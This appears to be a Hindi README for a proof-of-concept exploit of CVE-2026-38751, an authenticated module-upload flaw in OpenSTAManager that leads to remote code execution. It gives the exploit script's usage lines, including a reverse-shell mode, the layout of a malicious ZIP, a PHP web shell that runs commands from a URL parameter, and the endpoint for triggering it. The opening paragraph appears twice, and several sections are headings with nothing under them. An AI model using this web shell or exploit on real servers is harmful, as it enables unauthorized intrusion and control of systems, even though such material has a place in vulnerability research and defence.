
इस रिपॉजिटरी में CVE-2026-38751 के लिए एक प्रमाण-अवधारणा (PoC) शोषण शामिल है, जो OpenSTAManager ≤ 2.10 को प्रभावित करता है। यह भेद्यता एक प्रमाणित हमलावर को मॉड्यूल अपडेट कार्यक्षमता के माध्यम से एक दुर्भावनापूर्ण मॉड्यूल अपलोड करने की अनुमति देती है, जिससे मनमाना फ़ाइल अपलोड और रिमोट कोड निष्पादन (RCE) होता है।
इस रिपॉज़िटरी में CVE-2026-38751 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जो OpenSTAManager ≤ 2.10 को प्रभावित करता है। यह कमज़ोरी एक प्रमाणित हमलावर को मॉड्यूल अपडेट कार्यक्षमता के माध्यम से एक दुर्भावनापूर्ण मॉड्यूल अपलोड करने की अनुमति देती है, जिससे मनमाना फ़ाइल अपलोड और रिमोट कोड निष्पादन (RCE) होता है।
modules/aggiornamenti/upload_modules.php)मॉड्यूल अपडेट कार्यक्षमता प्रमाणित उपयोगकर्ताओं को फ़ाइल सामग्री या निष्पादन सीमाओं के उचित सत्यापन के बिना ZIP-आधारित मॉड्यूल अपलोड करने की अनुमति देती है। एक हमलावर PHP पेलोड युक्त एक दुर्भावनापूर्ण मॉड्यूल तैयार कर सकता है, जिसे फिर वेब रूट में तैनात किया जाता है और एप्लिकेशन संदर्भ के माध्यम से निष्पादित किया जाता है। इसके परिणामस्वरूप:
##प्रभाव सफल शोषण अनुमति देता है:
python exploit.py --build
बनाता है:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
वैकल्पिक रिवर्स शेल मोड:
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
उदाहरण पेलोड
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
सफल होने पर, निम्नलिखित एंडपॉइंट सिस्टम कमांड निष्पादित करता है:
/modules/run/evil.php?cmd=id
यह प्रोजेक्ट निम्नलिखित उद्देश्यों के लिए है:
स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।
नोट्स
सर्वर कॉन्फ़िगरेशन के आधार पर पता लगाना भिन्न हो सकता है। कुछ डिप्लॉयमेंट मॉड्यूल निर्देशिकाओं में प्रत्यक्ष PHP निष्पादन अक्षम कर सकते हैं। मॉड्यूल सक्रियण के समय में पुनः प्रयास की आवश्यकता हो सकती है।
आभार